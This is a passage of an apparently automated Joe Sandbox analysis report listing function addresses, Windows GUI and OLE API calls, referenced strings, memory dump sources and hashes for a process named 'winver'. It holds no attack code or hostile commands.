Opcode ID: 9f5c07396a20acf5ea5f434f27474c5daf073e532177d0d8b40d4c7f7fa5d1bb
Instruction ID: eb033e294e587c5aef55dee1a3768bf0325daa6bf205b6efaabbf3c75ca5adcc
Opcode Fuzzy Hash: 9f5c07396a20acf5ea5f434f27474c5daf073e532177d0d8b40d4c7f7fa5d1bb
Instruction Fuzzy Hash: 06F06862A0864641E7205B69F44176AA2B5FFC87D4F144234EB9D83BA5EF3CD4459B00

Function 00007FF63D7BC9FC Relevance: 2.7, Strings: 2, Instructions: 219COMMONLIBRARYCODE

Download Yara Rule

Strings

0, xrefs: 00007FF63D7BCBB3
0x%p, xrefs: 00007FF63D7BCA0B

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: 0$0x%p
API String ID: 3215553584-2479247192
Opcode ID: 4a551459eb202f1912c6750f5a327cd445731824e5f077defd06eeb769b9913c
Instruction ID: b09f6e551b759d551ba1c36272f5b29682f4611bb74cf3e39e55f45798eac78d
Opcode Fuzzy Hash: 4a551459eb202f1912c6750f5a327cd445731824e5f077defd06eeb769b9913c
Instruction Fuzzy Hash: 6681E522B1824B46EA688AB5804067E27B1EF40B44F549532FD0AD77D5FE2DF855FB00

Function 00007FF63D7D73E4 Relevance: 1.7, APIs: 1, Instructions: 194COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF63D7D7449

Part of subcall function 00007FF63D7C2B54: _invalid_parameter_noinfo.LIBCMT ref: 00007FF63D7C2B68

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo
String ID:
API String ID: 474895018-0
Opcode ID: 102adc394f59026247f36bd86044a64110f7403a8b40299d841129e40273a09e
Instruction ID: fdd59fcb2423d762a69069b109c67c9e9c4dfd81c11f5b61988152eea6012330
Opcode Fuzzy Hash: 102adc394f59026247f36bd86044a64110f7403a8b40299d841129e40273a09e
Instruction Fuzzy Hash: 1171F422F0C28A46F7648EE994817B966A1AF40364F144638DA6FC77D5FE7CF842A701

Function 00007FF63D7BC730 Relevance: 1.5, Strings: 1, Instructions: 219COMMONLIBRARYCODE

Download Yara Rule

Strings

0, xrefs: 00007FF63D7BC8E7

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: 0
API String ID: 3215553584-4108050209
Opcode ID: 29fe2f5d7720afd6494480201a2e252fe795065bd66789673dde529be61cb835
Instruction ID: 33e4dea57a4c5cb92a82a604343cae09493ec3112bb875432fe78430fbba4d75
Opcode Fuzzy Hash: 29fe2f5d7720afd6494480201a2e252fe795065bd66789673dde529be61cb835
Instruction Fuzzy Hash: B3811822A18A1B46FAA48AB5804067E23B0EF40B44F149535FD4EDB7D9EF2DF846F740

Function 00007FF63D7CAEA0 Relevance: 1.4, Strings: 1, Instructions: 139COMMON

Download Yara Rule

Strings

@, xrefs: 00007FF63D7CAEDC

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 0e8c155296b9f031e873379fa6b65c7462bc4d703a0e477038d506ab2b3c38d2
Instruction ID: 51f386e0a418fcee6d723523d022c89a4a97c7ef8a2d6f0b217b90c312e6f79a
Opcode Fuzzy Hash: 0e8c155296b9f031e873379fa6b65c7462bc4d703a0e477038d506ab2b3c38d2
Instruction Fuzzy Hash: 0141AF72B14B488AEA04CFAAD5542A973A1BB48FD0B49A036EE1D87754EE3CE446D340

Function 00007FF63D83FD70 Relevance: 49.7, APIs: 33, Instructions: 231windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32 ref: 00007FF63D83FDD8
SetTextColor.GDI32 ref: 00007FF63D83FDE3
GetSysColorBrush.USER32 ref: 00007FF63D83FDFC
GetSysColor.USER32 ref: 00007FF63D83FE0E
SetBkColor.GDI32 ref: 00007FF63D83FE2F
SelectObject.GDI32 ref: 00007FF63D83FE3E
InflateRect.USER32 ref: 00007FF63D83FE63
GetSysColor.USER32 ref: 00007FF63D83FE6E
CreateSolidBrush.GDI32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF63D84261E,?,?,?,00007FF63D7DA9C1), ref: 00007FF63D83FE76
FrameRect.USER32 ref: 00007FF63D83FE89
DeleteObject.GDI32 ref: 00007FF63D83FE92
InflateRect.USER32 ref: 00007FF63D83FEE7
FillRect.USER32 ref: 00007FF63D83FF17
GetWindowLongW.USER32 ref: 00007FF63D83FF36
SendMessageW.USER32 ref: 00007FF63D83FF83

Part of subcall function 00007FF63D8400C8: GetSysColor.USER32 ref: 00007FF63D84010F
Part of subcall function 00007FF63D8400C8: SetTextColor.GDI32 ref: 00007FF63D84011A
Part of subcall function 00007FF63D8400C8: GetSysColorBrush.USER32 ref: 00007FF63D840135
Part of subcall function 00007FF63D8400C8: GetSysColor.USER32 ref: 00007FF63D840148
Part of subcall function 00007FF63D8400C8: GetSysColor.USER32 ref: 00007FF63D840173
Part of subcall function 00007FF63D8400C8: CreatePen.GDI32 ref: 00007FF63D84018A
Part of subcall function 00007FF63D8400C8: SelectObject.GDI32 ref: 00007FF63D84019B
Part of subcall function 00007FF63D8400C8: SetBkColor.GDI32 ref: 00007FF63D8401AB
Part of subcall function 00007FF63D8400C8: SelectObject.GDI32 ref: 00007FF63D8401BE
Part of subcall function 00007FF63D8400C8: InflateRect.USER32 ref: 00007FF63D8401E5
Part of subcall function 00007FF63D8400C8: RoundRect.GDI32 ref: 00007FF63D840211
Part of subcall function 00007FF63D8400C8: GetWindowLongW.USER32 ref: 00007FF63D84021F

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: 366f9cc55676634bc184666de8efc267b684e92875be86e991feaef0d071fc15
Instruction ID: 14c22515e6a60df067b138fa4602076d7d15721d5523871aa11881775afc2d04
Opcode Fuzzy Hash: 366f9cc55676634bc184666de8efc267b684e92875be86e991feaef0d071fc15
Instruction Fuzzy Hash: 1BA19036F08A1686EB149FA1D8455BD2775BB49BA4F104334DE2E97BD4EF3CA4849340

Function 00007FF63D8400C8 Relevance: 39.2, APIs: 26, Instructions: 179windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32 ref: 00007FF63D84010F
SetTextColor.GDI32 ref: 00007FF63D84011A
GetSysColorBrush.USER32 ref: 00007FF63D840135
GetSysColor.USER32 ref: 00007FF63D840148
CreateSolidBrush.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF63D83FDA0), ref: 00007FF63D840152
GetSysColor.USER32 ref: 00007FF63D840173
CreatePen.GDI32 ref: 00007FF63D84018A
SelectObject.GDI32 ref: 00007FF63D84019B
SetBkColor.GDI32 ref: 00007FF63D8401AB
SelectObject.GDI32 ref: 00007FF63D8401BE
InflateRect.USER32 ref: 00007FF63D8401E5
RoundRect.GDI32 ref: 00007FF63D840211
GetWindowLongW.USER32 ref: 00007FF63D84021F
SendMessageW.USER32 ref: 00007FF63D84026C
GetWindowTextW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF63D83FDA0), ref: 00007FF63D8402A4
InflateRect.USER32 ref: 00007FF63D8402C7
DrawFocusRect.USER32 ref: 00007FF63D8402D5
GetSysColor.USER32 ref: 00007FF63D8402E4
SetTextColor.GDI32 ref: 00007FF63D8402EF
DrawTextW.USER32 ref: 00007FF63D84030D
SelectObject.GDI32 ref: 00007FF63D84032B
DeleteObject.GDI32 ref: 00007FF63D840339
SelectObject.GDI32 ref: 00007FF63D840347
DeleteObject.GDI32 ref: 00007FF63D840352
SetTextColor.GDI32 ref: 00007FF63D84035E
SetBkColor.GDI32 ref: 00007FF63D84036E

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 12339bd2ee90f5155eee7cb297d18aa4b7f40e31564e4bfc00c2e15a077a2217
Instruction ID: a48c664a9f9380f84e7aaa50efb1d75f7774b0619361c5246309b35ab01c0570
Opcode Fuzzy Hash: 12339bd2ee90f5155eee7cb297d18aa4b7f40e31564e4bfc00c2e15a077a2217
Instruction Fuzzy Hash: FD719136A08A5986E754DFA1E8456BA7379FB89BA0F004334DD6E83B94EF3CE4459700

Function 00007FF63D7922C0 Relevance: 28.7, APIs: 19, Instructions: 201COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF63D7923F0: GetWindowLongPtrW.USER32 ref: 00007FF63D792406

GetSysColor.USER32 ref: 00007FF63D792303
GetSysColor.USER32 ref: 00007FF63D792398
SetTextColor.GDI32 ref: 00007FF63D7923A3
SetBkMode.GDI32 ref: 00007FF63D7923B8
GetStockObject.GDI32 ref: 00007FF63D7923C3
GetSysColor.USER32 ref: 00007FF63D7DA798
GetWindowLongW.USER32 ref: 00007FF63D7DA7AD
SetBkColor.GDI32 ref: 00007FF63D7DA88A

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: Color$LongWindow$ModeObjectStockText
String ID:
API String ID: 554392163-0
Opcode ID: af23371f8dae758d3b45e0630f95e0e5df3451d58d741406c1df960f9a65c86d
Instruction ID: 866bc1799904115808dd2b5fa42af4090f2e1198fd5aac1602eceffdaf5da136
Opcode Fuzzy Hash: af23371f8dae758d3b45e0630f95e0e5df3451d58d741406c1df960f9a65c86d
Instruction Fuzzy Hash: E881D922D0C55B82FB709BA998486B923B6FF45B64F954231C95D877E4FE3CB842A700

Function 00007FF63D842668 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 162windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF63D7926F4: GetWindowLongPtrW.USER32 ref: 00007FF63D792711

DragQueryPoint.SHELL32 ref: 00007FF63D8426AC

Part of subcall function 00007FF63D840428: ClientToScreen.USER32(00000000,?,?,?,?,00007FF63D841FDD), ref: 00007FF63D840468
Part of subcall function 00007FF63D840428: GetWindowRect.USER32(?,?,?,?,00007FF63D841FDD), ref: 00007FF63D8404F7
Part of subcall function 00007FF63D840428: PtInRect.USER32 ref: 00007FF63D840507

SendMessageW.USER32 ref: 00007FF63D842723
DragQueryFileW.SHELL32 ref: 00007FF63D842735
DragQueryFileW.SHELL32 ref: 00007FF63D84275B
wcscat.LIBCMT ref: 00007FF63D84278F
SendMessageW.USER32 ref: 00007FF63D8427A6
SendMessageW.USER32 ref: 00007FF63D8427C0
SendMessageW.USER32 ref: 00007FF63D8427D8
SendMessageW.USER32 ref: 00007FF63D8427FD
DragFinish.SHELL32 ref: 00007FF63D842806
DefDlgProcW.USER32 ref: 00007FF63D842934

Strings

@GUI_DRAGFILE, xrefs: 00007FF63D8428C8
@GUI_DRAGID, xrefs: 00007FF63D84287F
@GUI_DROPID, xrefs: 00007FF63D842829

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreenwcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 2091158083-3440237614
Opcode ID: 6e96f6a3c7b4c107594507a88da68657c132c4d344a8877cfcaf0eb46b80f069
Instruction ID: 2398e4f6ad23dd007a8b5b7312dff3aa0244eb22f0c50d164b1a7a6c9afda4a0
Opcode Fuzzy Hash: 6e96f6a3c7b4c107594507a88da68657c132c4d344a8877cfcaf0eb46b80f069
Instruction Fuzzy Hash: 84718232618A8696E710DFA5E8417ED7734FB84B94F404032EA4D87B99EF7CE649D700

Function 00007FF63D811E18 Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 388COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 00007FF63D8120D5
VariantClear.OLEAUT32 ref: 00007FF63D8121C7

Strings

Default, xrefs: 00007FF63D811F31
%4d%02d%02d%02d%02d%02d, xrefs: 00007FF63D811FB8

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: Variant$ClearInit
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 2610073882-3931177956
Opcode ID: 56a0484181845edb179d494e40c5e1593fad1876c1cfef1bd35332c2d608985f
Instruction ID: 05d4862b63d8244efd516afb9133009de68eff519cad83eddfb05357f6c82d5f
Opcode Fuzzy Hash: 56a0484181845edb179d494e40c5e1593fad1876c1cfef1bd35332c2d608985f
Instruction Fuzzy Hash: 3F029E72A0965A81EB599FA9D05527C6370FF05B80F044135DB2E9BBA5EF3CFA58E300

Function 00007FF63D7FBE9C Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 117memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32 ref: 00007FF63D7FBED9
SafeArrayAllocData.OLEAUT32 ref: 00007FF63D7FBF3B
VariantInit.OLEAUT32 ref: 00007FF63D7FBF4D
SafeArrayAccessData.OLEAUT32 ref: 00007FF63D7FBF70
VariantCopy.OLEAUT32 ref: 00007FF63D7FBFDB
SafeArrayUnaccessData.OLEAUT32 ref: 00007FF63D7FBFEF
VariantClear.OLEAUT32 ref: 00007FF63D7FC006
SafeArrayDestroyData.OLEAUT32 ref: 00007FF63D7FC015
SafeArrayDestroyDescriptor.OLEAUT32 ref: 00007FF63D7FC01F
VariantClear.OLEAUT32 ref: 00007FF63D7FC032
SafeArrayDestroyDescriptor.OLEAUT32 ref: 00007FF63D7FC03E

Strings

NULL Pointer assignment, xrefs: 00007FF63D7FBEAB

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID: NULL Pointer assignment
API String ID: 2706829360-2785691316
Opcode ID: 7646b42f4a043ceafa08016b960a25d2293ab279b0d3c94c5ca1dd1a98f4ab22
Instruction ID: aeb96c7bd2039d49cfd58726eb418f5565212cffa64404aebec1cfd9a47aea01
Opcode Fuzzy Hash: 7646b42f4a043ceafa08016b960a25d2293ab279b0d3c94c5ca1dd1a98f4ab22
Instruction Fuzzy Hash: 3B514332B14A5A8AEB50DFA5D8856FC27B4FB84B88F444435EE0E87759EF38E549D300

Function 00007FF63D80B294 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 188windowsleepCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32 ref: 00007FF63D80B340
SetMenuItemInfoW.USER32 ref: 00007FF63D80B378
Sleep.KERNEL32 ref: 00007FF63D80B38B
GetMenuItemCount.USER32 ref: 00007FF63D80B3D1
GetMenuItemID.USER32 ref: 00007FF63D80B3EE
GetMenuItemID.USER32 ref: 00007FF63D80B415
GetMenuItemID.USER32 ref: 00007FF63D80B453
CheckMenuRadioItem.USER32 ref: 00007FF63D80B498
GetMenuItemInfoW.USER32 ref: 00007FF63D80B4B3
SetMenuItemInfoW.USER32 ref: 00007FF63D80B4D8

Strings

P, xrefs: 00007FF63D80B2BA

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep
String ID: P
API String ID: 1460738036-3110715001
Opcode ID: 28b248e44eb8f47eb054ece7f377c58de109bfba9d6e25bd5710de6f9582cf66
Instruction ID: 6081a2fadf82d7824f390e54575f7b3f02dda6ab5984101ee4497dd19227f477
Opcode Fuzzy Hash: 28b248e44eb8f47eb054ece7f377c58de109bfba9d6e25bd5710de6f9582cf66
Instruction Fuzzy Hash: 7271F422E0998A66F722CFA994406BD27A5FF45BCCF544031DA4D87B95EE3CF54AE300

Function 00007FF63D814430 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 135COMMON

Download Yara Rule

APIs

LoadStringW.USER32 ref: 00007FF63D81448D
LoadStringW.USER32 ref: 00007FF63D8144B3
wprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF63D8145FB
wprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF63D814617

Strings

Incorrect parameters to object property !, xrefs: 00007FF63D814578
Line %d (File "%s"):, xrefs: 00007FF63D814500
"%s" (%d) : ==> %s:%s%s, xrefs: 00007FF63D8145E2
"%s" (%d) : ==> %s:, xrefs: 00007FF63D814609
^ ERROR , xrefs: 00007FF63D814567
Error: , xrefs: 00007FF63D8145A9

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: LoadStringwprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 3297454147-3080491070
Opcode ID: 3be12cee0b957b97e40e71fbe952eccf59dff65d333cce9c2280a34f5bf1950c
Instruction ID: 2f487192ae2d7af91ab507eda947a16098d9c15d95c7fdb4a6b34f49f0c65a9e
Opcode Fuzzy Hash: 3be12cee0b957b97e40e71fbe952eccf59dff65d333cce9c2280a34f5bf1950c
Instruction Fuzzy Hash: 75615132A28A5A96EB10EFA5D8515ED6370FB40788F404032EA5D93B99FF3CF50AD700

Function 00007FF63D8082D8 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 128windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(000087FFFFFE03FF,00007FF63D7DD02F,?,?,?,?,?,?,?), ref: 00007FF63D808312
LoadStringW.USER32 ref: 00007FF63D80832D
GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?), ref: 00007FF63D808342
LoadStringW.USER32 ref: 00007FF63D808354
wprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF63D808495
MessageBoxW.USER32 ref: 00007FF63D8084AD

Strings

Line %d (File "%s"):, xrefs: 00007FF63D8083A7
%s (%d) : ==> %s: %s %s, xrefs: 00007FF63D808478
^ ERROR, xrefs: 00007FF63D80841A
Line %d:, xrefs: 00007FF63D8083B5
Error: , xrefs: 00007FF63D80844B

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: HandleLoadModuleString$Messagewprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 4051287042-2268648507
Opcode ID: 37212d4c0a5c65ad984eea6a739034b31e3e9a34cdf1dd499891168134c25cc1
Instruction ID: 6b9c6c7302f1e713837a7a6cc3a50627b4c6323a2ea3c9685baf67d666017f67
Opcode Fuzzy Hash: 37212d4c0a5c65ad984eea6a739034b31e3e9a34cdf1dd499891168134c25cc1
Instruction Fuzzy Hash: 80518122B28A5A91EB10EBA0D8414ED6375FF84794F804132EA4D9379AFF3CF50AD740

Function 00007FF63D7915EC Relevance: 18.2, APIs: 12, Instructions: 191timeCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 00007FF63D7916C8
KillTimer.USER32 ref: 00007FF63D7917A3
DestroyAcceleratorTable.USER32 ref: 00007FF63D7DA0B2

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: Destroy$AcceleratorKillTableTimerWindow
String ID:
API String ID: 1974058525-0
Opcode ID: 4b817d600a7c4f66f6c775b51f96eee663308776b01106002b289ea5c71441ab
Instruction ID: e2eb99b85a96a2b1c102050115b98d1f5c6009d48db9a0cc7caa8ada87019ad4
Opcode Fuzzy Hash: 4b817d600a7c4f66f6c775b51f96eee663308776b01106002b289ea5c71441ab
Instruction Fuzzy Hash: 83915926E09A0A85EB648F95E8506B823B4FF94B84F584131DE4EC7795EF3CF859E300

Function 00007FF63D791504 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 163windowCOMMON

Download Yara Rule

APIs

